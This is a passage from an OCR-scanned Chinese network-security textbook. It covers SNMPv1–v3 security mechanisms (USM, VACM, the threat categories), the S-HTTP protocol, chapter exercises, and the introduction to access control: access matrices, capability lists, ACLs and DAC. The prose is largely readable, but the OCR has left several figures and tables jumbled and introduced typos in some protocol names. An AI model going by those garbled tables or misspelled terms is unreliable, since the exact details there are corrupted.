一 般 来 说 ,认证 服务 的 目的 是 保证 通信 是 经 过 授权 的 。 在 SNMP 中 ,认证 服务 主要 是 
保证 接收 的 报 文 来 自 它 所 声称 的 源 。RFC 1157 提供 的 只 是 简单 的 认证 方案 : 从 管理 站 发 
送 到 代理 的 报 文 (Get、Set 等 ) 都 有 一 个 团体 名 ,就 像 是 口令 字 一 样 。 通 过 团体 名 验证 的 报 
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文才 是 有 效 的 。 可 以 看 出 ,SNMP 的 安全 机 制 是 很 不 安全 的 。 仅 仅 用 团体 名 验证 来 控制 访 
问 权限 是 不 够 的 。 而 且 团体 名 以 明文 的 形式 传输 ,很 容易 被 第 三 者 所 窃取 ,这 也 是 SNMP 
的 简单 性 。 由 于 这 个 缺陷 ,很 多 SNMP 的 实现 只 允许 Get 和 Trap 操作 , 即 只 具有 网 络 监 视 
功能 。 通 过 Set 操作 控制 网 络 设备 是 被 严格 限制 的 。 

2. SNMPv2 安全 机 制 

为 了 解决 SNMPv1l 安全 问题 ,SNMPv2 发 展 可 谓 曲 折 漫 长 ,先后 开发 了 如 下 的 协议 版 
本 : 基于 参加 者 SNMPsec、 基 于 参加 者 SNMPv2p、 基 于 共同 体 名 的 SNMPv2c、 基 于 用 户 的 
SNMPv2u、 基 于 用 户 的 SNMPv2 * 等 。 

虽然 SNMPv2 发 展 的 过 程 中 出 现 了 这 几 种 版 本 ,都 是 基于 SNMPv1 协议 自身 安全 问 
题 而 有 所 加 强 ,但 是 ,由 于 所 使 用 的 方法 无 法 得 到 统一 ,最 终 SNMPv2 并 没有 完全 实现 预期 
的 目标 ,尤其 是 安全 性 能 没有 得 到 提高 ,如 : 身份 验证 (如 用 户 初始 接 入 时 的 身份 验证 ,信息 
完整 性 的 分 析 、 重 复 操作 的 预防 ) 加密、 授权 和 访问 控制 适当 的 远程 安全 配置 和 管理 能 力 
等 都 没有 实现 。 通 常 所 说 的 SNMPv2 其 实 是 SNMPv2c, 虽 然 功能 增强 了 ,但 是 安全 性 能 仍 
没有 得 到 改善 ,而 是 继续 沿用 SNMPv1 的 基于 团体 名 的 明文 密 钥 的 身份 验证 方式 。 

SNMPv2 加 密 报 文 如 图 12. 32 所 示 。 
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图 12.32 SNMPv2 加 密 报 文 


。 privDst: 指向 目标 参加 者 的 对 象 标识 符 , 即 报 文 的 接收 者 ,这 一 部 分 是 明文 。 
。 privData(SnmpAuthMsg): 经 过 加 密 的 报 文 , 接 收 者 需 解密 后 才 可 以 阅读 。 
被 加 密 报 文 为 SnmpAuthMsg, 包 含 下 列 内 容 : 
。 authInfo: 认证 信息 ,由 消息 摘要 authDigest, 以 及 目标 方 和 源 方 的 时 间 戳 
authDstTimestamp 和 authSrcTimestamp 组 成 。 
。 authData(SnmpMgmtCom) : 即 经 过 认证 的 管理 消息 ,包含 目标 参加 者 dstParty、 源 
参加 者 srcParty、 上 下 文 context 以 及 协议 数据 单元 pdu4 个 部 分 。 
SNMPv2 加 密 报 文 操作 如 下 : 发 送 实 体 首先 构造 管理 通信 消息 SompMgmtCom, 这 需 
要 查找 本 地 数据 库 , 发现 合法 的 参加 者 和 上 下 文 。 然 后, 如 果 需 要 认证 协议 , 则 在 
SnmpMgmtCom 前 面 加 上 认证 信息 authInfo. 构 成 认证 报 文 SnompAuthMsg, 否则 把 
authInfo 置 为 长 度 为 0 的 字 节 串 (OCTET STRING)。 若 参加 者 的 认证 协议 为 
v2md5Authprotocol, 则 由 本 地 实体 按照 MD5 算法 计算 产生 16 个 字 节 的 消息 摘要 ,作为 认 
证 信息 中 的 authDigest。 第 三 步 是 检查 目标 参加 者 的 加 密 协 议 , 如 果 需 要 加 密 , 则 采用 指定 
的 加 密 协 议 对 SnmpAuthMsg 加 密 , 生 成 privData (SnmpAuthMsg)。 最 后 privDst 一 


dstParty, 组 成 完整 的 SNMPv2 报 文 ,并 经 过 BER 编码 发 送出 去 。 目 标 方 实体 接收 到 
SnmpPrivMsg 后 首先 检查 报 文 格式 ,如 果 这 一 检查 通过 , 则 查找 本 地 数据 库 ,发 现 需 要 的 验 
证 信息 。 根 据 本 地 数据 库 记录 ,可 能 需要 使 用 加 密 协议 对 报 文 解密 ,对 认证 码 进行 验证 , 检 
查 源 方 参加 者 的 访问 特权 和 上 下 文 是 否 符合 要 求 等 。 一 旦 这 些 检查 全 部 通过 ,就 可 以 执行 


协议 请 求 的 操作 。 
3. SNMPv3 安全 机 制 


1998 年 1 月 ,IETF SNMPv3 工作 组 公布 了 SNMPv3。 


它 由 RFC 2271 一 REFC 2275 组 


成 ,SNMPv3 参考 了 了 SNMPv2 * 与 SNMPv2u, 采 用 基于 用 户 的 管理 框架 。SNMPv3 主要 在 
安全 性 和 管理 机 制 方面 扩展 了 SNMPv2, 而 并 未 定义 新 的 PDU 格式 ,继续 使 用 SNMPv1 和 
SNMPv2 的 PDU 格式 。RFC 2271 定义 了 SNMPv3 的 体系 结构 ,体现 出 模块 化 设计 思想 ， 
可 以 简单 地 实现 功能 的 增加 和 修改 。SNMP 代理 和 SNMP 管理 站 通称 为 SNMP 实体 ,由 
SNMP 引擎 和 SNMP 应 用 程序 两 部 分 组 成 ,如 图 12. 33 所 示 。SNMP 引擎 由 4 个 组 件 组 
成 : 调度 器 、 消 息 处 理子 系统 、 安 全 子 系 统 和 访问 控制 子 系 统 。SNMPv3 应 用 程序 是 SNMP 
实体 内 的 应 用 程序 ,当前 定义 了 5 类 应 用 程序 : 命令 生成 器 、 命 令 响应 器 .通知 发 生 器 .通知 


接收 器 和 代理 转发 器 。 
SNMP 实体 
SNMP 引擎 (由 snmpEngineID 标识 ) 
消息 处 理 安全 访问 控制 
子 系统 子 系统 子 系统 
应 用 程序 
命令 生成 器 | | 通知 发 生 器 | | 代理 转发 器 
命令 响应 器 | | 通知 接收 器 其 他 应 用 


12.33 SNMP 实体 


RFC 2274 定义 了 SNMPv3 的 基于 用 户 的 安全 模型 (User Security Model,USM) , 它 提 
供 了 消息 验证 .适时 性 和 加 密 等 安全 服务 。RFC 2275 定义 了 SNMPv3 的 VACM( 基 于 视 


图 的 访问 控制 模型 ) , 它 确定 是 否 允 许 访问 一 个 管理 对 象 。 


1) 基于 用 户 的 安全 模型 USM 
每 个 SNMPv3 消息 包含 有 安全 参数 。 这 些 安全 参数 的 意义 取决 于 使 用 的 安全 模型 。 
对 于 基于 用 户 的 安全 模型 ,安全 参数 代表 了 如 下 的 ASN. 1 序列 : 


USMSecurityParametersSyntax DEFINITIONS IMPLICIT TAGS:: = BEGIN 


UsmSecurityParameters:: = 


SEQUENCE { —— gllobal User - based security parameters 
msgAuthoritativeEngineID OCTET STRING, 
msgAuthoritativeEngineBoots INTEGER(0. .2147483647), 
msgAuthoritativeEngineTime INTEGER(0. .2147483647), 

msgUserName OCTET STRING( SIZE(0. .32)), 
—— authentication protocol specific parameters 
msgAuthenticationParameters OCTET STRING, 
—— privacy protocol specific parameters 
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msgPrivacyParameters OCTET STRING} 
END 
SNMPv3 使 用 msgAuthoritativeEngineBoots 和 msgAuthoritativeEngineTime 对 象 进 
行 适时 性 检查 。SNMPv3 基于 用 户 的 安全 模型 允许 使 用 两 种 认证 协议 : HMAC-MD5-96 
和 HMAC-SHA-96,msgAuthenticationParameters 对 象 就 是 认证 协议 计算 出 来 的 消息 摘 
要 。SNMPv3 基于 用 户 的 安全 模型 为 加 密使 用 DES-CBC 对 称 加 密 协 议 ， 
msgPrivacyParameters 对 象 是 其 使 用 的 一 个 参数 。 在 认证 消息 使 用 的 密 钥 时 还 需 用 到 
msgUserName 和 msgAuthoritativeEngineID 。 
2) 基于 视图 的 访问 控制 模型 VACM 
SNMPv3 基于 视图 的 访问 控制 通过 将 用 户 和 MIB 视图 关联 来 达到 访问 控制 的 目的 。 
MIB 视图 定义 了 包含 在 这 个 视图 之 中 以 及 排除 在 这 个 视图 之 外 的 管理 信息 。 
无 论 是 需要 生成 一 个 通知 消息 ,还 是 接收 到 Get、Get-Next、Get-Bulk 或 Set 请 求 ,都 需 
要 检查 这 个 用 户 是 否 有 权 访 问 其 PDU 的 变量 绑 定 中 指定 的 MIB 对 象 。 为 了 达到 检查 的 目 
的 ,需要 将 用 户 映射 为 一 个 MIB 视图 ,而 这 个 MIB 视图 定义 了 该 用 户 可 以 访问 的 MIB 对 
象 。 此 外 ,根据 所 使 用 的 安全 模型 ,或 者 根据 是 否 使 用 认证 或 加 密 技 术 ,使 用 不 同 的 MIB 视 
图 。 例 如 : 如 果 没 有 使 用 加 密 技 术 , 可 能 需要 禁止 对 敏感 数据 的 访问 ,以 免 被 窃听 。 最 后 ， 
不 同 的 MIB 视图 可 能 需要 根据 所 执行 的 读 操 作 、 写 操作 ,还 是 生成 一 个 通知 来 决定 。 
SNMPv3 提供 了 认证 、 加 密 和 访问 控制 等 安全 机 制 。SNMPv3 管理 框架 允许 机 密 性 和 
认证 的 任意 形式 的 结合 .因此 可 提供 4 种 不 同安 全 性 配置 : 不 认证 不 加 密 
(CnoAuthNoPriv)、 认 证 但 不 加 密 (CauthNoPriv)、 不 认证 但 加 密 (CnoAuthPriv) 和 认证 且 加 密 
CauthPriv) ,不 认证 而 加 密 (noAuthPriv) 这 种 安全 配置 方式 被 RFC 3411 禁止 使 用 ,因为 RFC 
3411 要 求 : 如 果 不 认证 也 就 不 能 进行 加 密 操作 ,只 有 认证 后 才 可 以 选择 是 否 对 消息 进行 加 密 。 
SNMPv3 把 对 网 络 协议 的 安全 威胁 分 为 主要 的 和 次 要 的 两 类 。 标 准 规定 安全 模块 必 
须 提供 防护 的 两 种 主要 威胁 如 下 : 
。 修改 信息 (Modification of Information) 一 一 就 是 某 些 未 经 授权 的 实体 改变 了 进来 
的 SNMP 报 文 , 企 图 实施 未 经 授权 的 管理 操作 ,或 者 提供 虚假 的 管理 对 象 。 
。 假冒 (Masquerade) 一 一 即 未 经 授权 的 用 户 冒 充 授 权 用 户 的 标识 ,企图 实施 管理 
操作 。 
标准 还 规定 安全 模块 必须 对 两 种 次 要 威胁 提供 防护 : 
。 修改 报 文 流 (Message Stream Modification) 一 一 由 于 SNMP 协议 通常 是 基于 无 连 
接 的 传输 服务 ,重新 排序 报 文 流 、 延 迟 或 重 放 报 文 的 威胁 都 可 能 出 现 。 这 种 威胁 的 
危害 性 在 于 通过 报 文 流 的 修改 可 能 实施 非法 的 管理 操作 。 
。 消息 泄露 (Disclosure) 一 一 SNMP 引擎 之 间 交 换 的 信息 可 能 被 偷 听 ,对 这 种 威胁 的 
防护 应 采取 局 部 的 策略 。 
有 两 种 威胁 是 安全 体系 结构 不 必 防 护 的 ,因为 它们 不 是 很 重要 ,或 者 这 种 防护 没有 多 大 
作用 。 
(1) 拒绝 服务 (Denial of Service,DOS): 因为 在 很 多 情况 下 拒绝 服务 和 网 络 失效 是 无 
法 区 别 的 ,所 以 可 以 由 网 络 管理 协议 来 处 理 , 安 全 子 系统 不 必 采 取 措 施 。 
(2) 信息 流 分 析 (Traffic Analysis) : 即 由 第 三 者 分 析 管 理 实体 之 间 的 通信 规律 ,从 而 获 


取 需 要 的 信息 。 由 于 通常 都 是 由 少数 管理 站 来 管理 整个 网 络 的 ,所 以 管理 系统 的 通信 模式 
是 可 预见 的 ,因而 防护 信息 流 分 析 就 没有 多 大 作用 了 。 

由 此 可 以 看 出 ,SNMPv3 对 于 威胁 方面 的 防护 不 是 全 面 ,因为 SNMP 是 运行 在 UDP 这 
种 不 可 靠 的 传输 层 协 议 之 上 ,因此 SNMP 的 设计 要 尽 可 能 简单 ,当然 SNMPv3 也 不 例外 。 
而 现在 随 着 网 络 技 术 的 发 展 ,对 网 络 的 攻击 手段 也 存在 多 样 性 ,这 就 给 网 络 安 全 管理 提出 了 
更 高 的 要 求 。 

SNMP 协 议 从 SNMPv1、SNMPv2, 再 到 SNMPv3, 安全 性 能 有 所 加 强 ,特别 是 
SNMPv3 增加 了 基于 用 户 的 安全 模型 USM 和 基于 视图 的 访问 控制 模型 YACM ,大 大 增强 
了 SNMP 安全 性 。 但 是 USM 中 使 用 的 认证 方式 是 基于 代理 的 ,认证 是 单 向 的 ,因为 管理 
站 被 看 做 是 经 过 授权 的 ,因此 它 可 以 免 于 认证 。 由 于 认证 是 单 向 的 ,所 以 这 也 给 某 些 攻击 提 
供 了 条 件 ; 再 有 就 是 认证 中 的 消息 摘要 使 用 的 MD5 算法 ,这 种 算法 的 原理 已 经 泄露 ,同样 
给 网 络 安全 管理 带 来 了 难度 。SNMPv3 中 对 信息 的 加 密使 用 的 是 DES 算法 ,该 算法 使 用 的 
密 钥 是 单一 密 钥 , 也 就 是 说 加 密 和 人 解密 使 用 同一 个 密 钥 , 密 钥 的 保密 是 一 个 问题 ,一 旦 密 钥 
丢失 , 则 加 密 信息 不 再 具有 保密 性 了 。 再 有 密 钥 在 线路 上 传输 也 存在 被 窃取 的 可 能 ,如 果 传 
输 线路 没有 被 加 密 的 话 。DES 算法 的 密 钥 长 度 仅 有 56 位 , 密 钥 长 度 不 够 长 ,同样 也 存在 安 
全 隐患 。 因 此 ,网 络 安全 管理 需 加 强 。 


12.4.4 S-HTTP 协议 


S-HTTP(The Secure HyperText Transfer Protocol, 安全 HTTP 协议 ) 是 IETF 
(Internet Engineering Task Force) 制 定 的 一 种 带 有 身份 认证 ,数据 加 密 .数据 完整 性 功能 的 
应 用 层 协议 。S-HTTP 是 对 HTTP 的 改进 ,加 入 了 对 安全 功能 的 支持 。 

在 早期 的 WWW 访问 协议 HTTP 中 ,并 没有 考虑 到 安全 问题 ,WWW 服务 的 安全 就 只 
能 依赖 于 服务 器 和 客户 的 其 他 方面 设置 。 

1999 年 ,IETF 发 布 了 RFC 2660 一 一 The Secure HyperText Transfer Protocol, 即 安全 
HTTP 协议 (简称 SHTTP)。S HTTP 协议 支持 通信 双方 利用 公 钥 算法 和 PKI 数字 证 书 进 行 
身份 认证 .加密 算 法 和 MAC(Message Authenticity Check) 算 法 协商 ,建立 安全 可 信 的 连接 。 

S-HTTP 连接 的 建立 过 程 大 致 如 下 : 

(1) 客户 对 服务 器 进行 认证 ,服务 器 对 客户 的 认证 则 是 可 选 的 。 

(2) 利用 认证 过 程 得 到 的 数字 证 书 ,双方 进行 对 称 加 密 算法 会 话 密 钥 和 MAC 算法 的 协商 。 

(3) 根据 协商 的 结果 进行 协议 数据 的 加 密 传输 ,并 且 由 MAC 算法 保证 数据 完整 性 。 

S-HTTP 协议 的 通信 和 都 是 经 过 加 密 的 ,其 机 密 性 由 协商 使 用 的 对 称 加 密 算法 来 保证 。 
因为 SHTTP 协议 中 引入 PKI 技术, 在 认证 和 密 钥 协 商 过 程 中 使 用 PKI 数字 证 书 , 使 得 事 
先 没 有 建立 直接 联系 的 双方 可 以 利用 数字 证 书 建立 安全 可 信 的 连接 ,只 要 双方 都 信任 对 方 
的 根 CA; 非常 适合 于 大 规模 WWW 服务 的 应 用 环境 。 


12.5 小 结 


数据 链 路 层 安 全 就 是 对 要 通过 物理 媒介 传输 的 每 一 个 字 节 进行 加 密 .解密 则 在 收 到 时 
处 理 。 网 络 层 提供 安全 服务 实现 网 络 的 安全 访问 具有 很 多 先天 性 的 优点 : 常见 的 安全 认 
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证 ,数据 加 密 、 访 问 控制 完整 性 鉴别 等 ,都 可 以 在 网 络 层 实现 ,并 具有 透明 性 。 传 输 层 安全 
是 为 进程 之 间 的 数据 通信 增加 安全 属性 。 应 用 层 的 安全 要 根据 某 个 具体 的 应 用 程序 对 安全 
的 实际 要 求 来 进行 安全 加 密 。 

网 络 不 同 层次 的 安全 服务 总 结 如 图 12. 34 所 示 。 


应 用 层 身份 认证 。 用 户 授权 与 访 ”应 用 层 安全 ”数字 签名 主机 和 服务 应 用 系统 的 容 


问 控制 通信 协议 第 三 方 公证 ”的 审计 记录 错 容 灾 、 服务 。 应 
分 析 管理 国 
应 用 层 代理 或 电路 层 防火 墙 ”传输 层 安全 系 
传输 层 | 网 管 (如 SOCKS) 通信 协议 
络 层 | 主机 路 由 器 等 包 过 滤 防 。 主机 或 路 由 器 同 流量 分 析 入 ”网 络 结构 设计 ， 网 
网 络 层 | 源 发 认证 火 墙 IPSec 等 协议 侵 检测 路 由 系统 安全 ， 络 
基础 服务 安全 ，” 吉 
数据 链 | 相 邻 节点 间 的 点 到 点 之 间 网 络 管理 
路 层 与 | 认证 的 链 路 加 密 
物理 层 
认 访 数 数 搞 审 可 
证 问 据 据 抵 计 用 
控 完 保 地 性 
币 整 密 
性 ”人 性 


12.34 网 络 不 同 层次 的 安全 服务 


12.6 习 题 


. 简 述 不 同 网 络 层次 安全 保障 的 优势 与 不 足 。 

. 简 述 L2TP PPP 连接 全 程 建立 过 程 。 

. IPSec 提供 哪些 服务 ? 请 给 出 IPSec 的 一 个 应 用 范例 。 
. 在 SSL A 

5. 说 明 SSL 协议 是 如 何 抵御 各 种 Web 的 安全 威胁 的 : 
(1) 强行 密码 分 析 攻 击 。 

(2) 重 放 攻 击 。 

(3) 中 间 人 攻击 。 

6. 本 质 上 讲 ,SET 提供 了 哪 三 种 服务 ? 


i27， 实 验 


> 


1. IPSec 协议 的 配置 。 
2. 配置 支持 SSL 协议 的 安全 网 站 。 
3. PGP 实现 邮件 加 密 和 签名 。 
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只 要 能 去 的 地 方 ,就 有 危险 。 
一 -网 络 名言 


本 章 主要 讲解 了 访问 控制 和 VPN 技术 两 大 方面 内 容 , 首 先 介绍 访问 控制 的 基本 概念 
与 定义 ,重点 介绍 自主 访问 控制 技术 、 强 制 访问 控制 技术 和 基于 角色 的 访问 控制 技术 ,对 这 
3 种 基本 访问 控制 技术 的 实现 方法 、 分 类 和 模式 进行 全 面 的 讲解 与 分 析 , 然 后 在 本 章 的 后 半 
部 分 对 VPN 的 工作 原理 、 体 系 结构 和 分 类 做 了 概述 ,接着 对 VPN 中 使 用 到 的 关键 技术 , 包 
括 隧道 技术 、 加 密 技术 、QoS 技术 做 了 说 明 , 最 后 介绍 了 VPN 的 构建 方案 ,包括 内 联网 
VPN 构建 方案 .外 联网 VPN 构建 方案 和 远程 接 入 VPN 构建 方案 ,并 分 析 了 这 3 种 方案 各 
自 的 特点 和 适用 环境 。 


13.1 访问 控制 技术 概述 


随 着 计算 机 技术 ,特别 是 网 络 技术 的 发 展 ,大 型 网 络 应 用 系统 或 数据 库 管 理 系统 所 面临 
的 一 个 难题 就 是 日 益 复杂 的 数据 资源 的 安全 管理 。 国 际 标准 化 组 织 ISO 在 网 络 安全 标准 
(ISO 7498 一 2) 中 定义 的 5 个 层次 型 安全 服务 中 ,访问 控制 是 其 中 一 个 重要 组 成 部 分 。 在 网 
络 安全 环境 中 ,访问 控制 能 够 限制 和 控制 通过 通信 和 链 路 对 主机 系统 和 应 用 的 访问 。 为 了 达 
到 这 种 控制 ,每 个 想 获 得 访问 的 实体 都 必须 经 过 鉴别 或 身份 验证 ,这 样 才能 根据 个 体 来 制定 
访问 权利 。 访 问 控制 服务 用 于 防止 未 授权 用 户 非 法 使 用 系统 资源 。 它 包括 用 户 身份 验证 ， 
也 包括 用 户 的 权限 确认 。 这 种 保护 服务 可 提供 给 用 户 组 。 


13.1.1 访问 控制 技术 概念 


访问 控制 是 通过 某 种 途径 显 式 地 准许 或 限制 访问 能 力 及 范围 的 一 种 方式 。 通 过 限制 对 
关键 资源 的 访问 ,防止 非法 用 户 的 侵入 或 因为 合法 用 户 的 不 慎 操 作 而 造成 的 破坏 ,从 而 保证 
网 络 资源 受 控 和 合法 使 用 , 它 是 针对 越权 使 用 资源 的 防御 措施 。 用 户 只 能 根据 自己 的 权限 
大 小 来 访问 系统 资源 ,不 得 越权 访问 。 访 问 控 制 技术 是 建立 在 身份 验证 基础 上 的 ,简单 地 来 
说 ,身份 认证 解决 的 是 “你 是 谁 ,你 是 否 真 的 是 你 所 声称 的 身份 ”这 个 问题 ,而 访问 控制 技术 
解决 的 是 “你 能 做 什么 ,你 有 什么 样 的 权限 ”这 个 问题 ,访问 控制 在 安全 服务 系统 中 的 位 置 如 
图 13.1 所 示 。 

访问 控制 系统 一 般 包 括 以 下 几 个 实体 。 
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。 主 体 (Subject) : 发 出 访问 指令 、 存 取 要 求 的 主动 方 , 通 常 指 用 户 或 用 户 的 某 个 进程 。 

。 客体 (Object) : 被 访问 的 对 象 , 可 以 是 被 调用 的 程序 .进程 ,要 存 取 的 数据 ,信息 ,要 
访问 的 文件 .系统 或 各 种 网 络 设备 .设置 等 资源 。 

。 安全 访问 政策 : 一 套 规则 ,用 以 确定 一 个 主体 是 否 对 客体 拥有 访问 能 力 。 


授权 数据 库 


| 
用 户 -一 |[ 访问 监视 器 | 一 [目标 资源 


~、、 认 证 访问 控制 -一 


审计 


13.1 一 个 安全 系统 的 逻辑 模型 


因此 ,访问 控制 的 目的 可 概括 为 : 限制 主体 对 访问 客体 的 访问 权限 ,从 而 使 计算 机 系统 
资源 能 在 合法 范围 内 使 用 ; 决定 用 户 能 做 什么 ,也 决定 代表 一 定 用 户 利益 的 程序 可 以 做 什 
么 。 访 问 控 制 机制 可 以 限制 对 关键 资源 的 访问 ,防止 非法 用 户 进入 系统 及 合法 用 户 对 系统 
资源 的 非法 使 用 。 目 前 的 主流 访问 控制 技术 有 自主 访问 控制 (DAC)、 强 制 访问 控制 
(MAC) 、 基 于 角色 的 访问 控制 (RBAC)。 自 主 访问 控制 和 强制 访问 控制 ,都 是 由 主体 和 访 
问 权 限 直 接 发 生 关系 ,主要 针对 用 户 个 人 授予 权限 。 


13.1.2 访问 控制 技术 一 般 方 法 


较为 常见 的 访问 控制 的 实现 方法 主要 有 以 下 4 种 : 访问 控制 矩阵 .访问 能 力 表 、 访 问 控 
制 表 和 授权 关系 表 。 

1. 访问 控制 矩阵 

从 数学 角度 看 ,访问 控制 可 以 很 自然 地 表示 为 一 个 矩阵 的 形式 : 行 标识 客体 (各 种 资 
源 ), 列 表示 主体 (通常 为 用 户 ) , 行 和 列 的 交叉 点 标识 某 个 主体 对 某 个 客体 的 访问 权限 (比如 
读 、 写 执行、 修改 .删除 等 )。 表 13. 1 是 一 个 访问 控制 矩阵 的 例子 。 在 这 个 例子 中 ,Jack、 
Mary、Lily 是 3 个 主体 ,客体 有 4 个 文件 (file) 和 2 个 账户 (account) 。 从 该 访问 控制 矩阵 可 
以 看 出 ,Jack 是 file \files 的 拥有 者 (own) ,而且 能 够 对 其 进行 读 (r)、 写 操作 (w) ,但 是 Jack 
对 files ,files 就 没有 访问 权 。 需 要 注意 的 是 ,拥有 者 的 确切 含义 会 因 不 同 的 系统 而 拥有 不 同 
的 含义 ,通常 一 个 文件 的 拥有 (own) 权 限 表示 可 以 授予 (authorize) 或 者 撤销 (revoke) 其 他 
用 户 对 该 文件 的 访问 控制 权限 ,比如 Jack 拥有 file 的 own 权限 ,他 就 可 以 授予 Mary 读 或 
者 Lily 读 、 写 权限 ,也 可 以 撤销 给 他 们 的 权限 。 

对 账户 的 访问 权限 展示 了 访问 可 以 被 应 用 程序 的 抽象 操作 所 控制 。 查 询 (inquiry) 操 
作 与 读 操作 类 似 , 它 只 检索 数据 而 并 不 改动 数据 。 借 (debit) 操 作 和 贷 (credit) 操 作 与 写 操 
作 类 似 , 要 对 原始 数据 进行 改动 ,都 会 涉及 读 原先 账户 平衡 信息 、 改 动 并 重 写 。 实 现 这 两 种 
操作 的 应 用 程序 需要 有 对 账户 数据 的 读 、 写 权限 ,而 用 户 并 不 允许 直接 对 数据 进行 读 写 ,只 
能 通过 已 经 实现 借 、 贷 操作 的 应 用 程序 来 间接 操作 权限 。 


表 13.1 一 个 访问 控制 矩阵 的 例子 


file: files files file, accounti accountz 
own own 
inquiry 
Jack r r 
credit 
w Ww 
own TS Sy 
M inquiry inquiry 
ary 工 2 w r 
debit credit 
w 
own 
r inquiry 
Lily 二 r 
w debit 
w 
2. 访问 能 力 表 


前 面 的 访问 控制 矩阵 虽然 直观 ,但 是 可 以 发 现 并 不 是 每 个 主体 和 客体 之 间 都 存在 着 权 
限 关系 ,相反 ,实际 的 系统 中 虽然 可 能 有 很 多 的 主体 和 客体 ,但 主体 和 客体 之 间 的 关系 可 能 
并 不 多 ,这 样 就 会 存在 很 多 的 空白 项 。 为 了 减轻 系统 开销 ,可 以 从 主体 ( 行 ) 出 发 ,表达 矩阵 
某 一 行 的 信息 ,这 就 是 访问 能 力 表 (capability); 也 可 以 从 客体 ( 列 ) 出 发 ,表达 矩阵 某 一 列 的 
信息 ,这 便 成 了 访问 控制 表 (access control list) 。 这 里 先 介绍 访问 能 力 表 。 

能 力 (capability) 是 受 一 定 机 制 保护 的 客体 标志 ,标记 了 客体 以 及 主体 (访问 者 ) 对 客体 
的 访问 权限 。 只 有 当 一 个 主体 对 某 个 客体 拥有 访问 能 力 的 时 候 , 它 才能 访问 这 个 客体 。 
图 13.2 是 用 文件 的 访问 能 力 表 的 表示 方法 对 表 13. 1 中 的 例子 进行 的 表示 。 


i filel files 
Je own own 
r , 
Ww w 
Mary filey 人 file: file3 filea 
T own Ww r 
r 
Ww 
Lily 2 file» files 
r r own 
疹 t 
Ww 


图 13.2 访问 能 力 表 的 例子 


可 以 看 出 ,在 访问 能 力 表 中 ,由 于 它 着 眼 于 某 一 主体 的 访问 权限 ,以 主体 为 出 发 点 描述 
控制 信息 ,因此 很 容易 获得 一 个 主体 所 授权 可 以 访问 的 客体 及 其 权限 ,但 如 果 要 求 获得 对 某 
一 特定 客体 有 特定 权限 的 所 有 主体 就 比较 困难 。 早 期 很 多 基于 访问 能 力 表 的 计算 机 系统 被 
开发 出 来 后 在 商业 上 并 不 成 功 。 在 一 个 安全 系统 中 , 正 是 客体 本 身 需要 得 到 可 靠 的 保护 , 访 
问 控制 服务 也 应 该 能 够 控制 可 访问 某 一 客体 的 主体 集合 ,能 够 授予 或 取消 主体 的 访问 权限 ， 
于 是 出 现 了 以 客体 为 出 发 点 的 实现 方式 一 一 ACL( 访 问 控制 表 ) ,现代 的 操作 系统 大 体 上 都 
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采用 基于 ACL 的 方法 。 

3. 访问 控制 表 

访问 控制 表 (Access Control List,ACL) 是 目前 采用 最 多 的 一 种 实现 方式 。 它 可 以 对 某 
一 特定 资源 指定 任意 一 个 用 户 的 访问 权限 ,还 可 以 将 有 相同 权限 的 用 户 分 组 ,并 授予 组 的 访 
问 权 。 图 13. 3 是 表 13. 1 的 例子 中 文件 的 访问 控制 表 表示 。 


ACL 的 优点 在 于 它 的 表述 直观 .易于 理解 ， i Ny Hr 

而 且 比较 容易 查处 对 某 一 特定 资源 拥有 访问 权 “| ow ， r 

限 的 所 有 用 户 , 有 效 地 实施 授权 管理 。 在 一 些 实 w uw 
ary 


际 应 用 中 ,还 对 ACL 做 了 扩展 ,从 而 进一步 控制 
用 户 的 合法 访问 时 间 , 是 否 需要 审计 等 。 file; MM 

尽管 ACL 灵活 方便 ,但 将 它 应 用 到 网 络 规 r r 
模 较 大 、 需 要 复杂 的 企业 的 内 部 网 络 时 ,就 暴露 


了 一 些 问 题 。 fle 一 = Jack Mary 

(1) ACL 需要 对 每 个 资源 指定 可 以 访问 的 LA 机 
用 户 或 组 以 及 相应 的 权限 。 当 网 络 中 资源 很 多 Ww 
时 ,需要 在 ACL 中 设 定 大 量 的 表 项 。 而 且 , 当 用 
户 的 职位 职责 发 生变 化 时 ,为 反映 这 些 变化 , 管 。files 一 = 9 5 
理 员 需 要 对 用 户 对 所 有 资源 的 访问 权限 进行 修 
改 。 另 外 ,在 许多 组 织 中 ,服务 器 一 般 是 彼此 独 
立 的 ,各 自 设 置 自己 的 ACL, 为 了 实现 整个 组 织 图 13.3 访问 控制 表 ACL 的 例子 
范围 内 的 一 致 的 控制 政策 ,需要 各 管理 部 门 的 密 
切合 作 。 所 有 这 些 ,使 得 访问 控制 的 授权 管理 变 得 费力 而 繁琐 , 且 容 易 出 错 。 

(2) 单纯 使 用 ACL ,不易 实 现 最 小 权限 原则 及 复杂 的 安全 策略 。 

4. 授权 关系 表 

我 们 已 经 看 到 了 基于 ACL 和 基于 访问 能 力 表 的 方法 都 有 自身 的 不 足 与 优势 , 下面 来 
看 另 一 种 方法 一 一 授权 关系 表 (authorization relations) 。 它 的 例子 如 表 13. 2 所 示 。 


表 13.2 授权 关系 表 


主体 访问 权限 客体 主体 访问 权限 客体 
Jack own file' Mary w file, 
Jack 认 file Mary w files 
Jack w file' Mary r file 
Jack own files Lily r file' 
Jack 这 files Lily w filei 
Jack w files Lily r file> 
Mary r file Lily own file, 
Mary own file> Lily 入 file, 
Mary r files Lily w files 


从 表 13.2 中 可 以 看 出 ,每 一 行 (或 称 一 个 元 组 ) 表 示 了 主体 和 客体 的 一 个 权限 关系 , 因 
此 Jack 访问 file 的 权限 关系 需要 3 行 。 如 果 这 张 表 按 客体 进行 排序 ,就 可 以 拥有 访问 能 力 


表 的 优势 ,如 果 按 主体 进行 排序 的 话 , 那 又 拥有 了 访问 控制 表 的 好 处 。 这 种 实现 方式 也 特别 
适合 采用 关系 数据 库 。 


13.2 自主 访问 控制 


13.2.1 自主 访问 控制 概述 


自主 访问 控制 (Discretionary Access Control,DAC) 是 最 常用 的 一 类 访问 控制 机 制 ,是 
用 来 决定 一 个 用 户 是 否 有 权 访 问 一 些 特定 客体 的 一 种 访问 约束 机 制 。 在 自主 访问 控制 机 制 
下 ,文件 的 拥有 者 可 以 按照 自己 的 意愿 精确 指定 系统 中 的 其 他 用 户 对 其 文件 的 访问 权 。 亦 
即使 用 自主 访问 控制 技术 ,一 个 用 户 可 以 自主 地 说 明 自 己 所 拥有 的 资源 允许 系统 中 哪些 用 
户 以 何 种 权限 进行 共享 。 从 这 种 意义 上 讲 ,这 是 “自主 ”的 一 个 方面 。 另 外 自主 也 指 对 其 他 
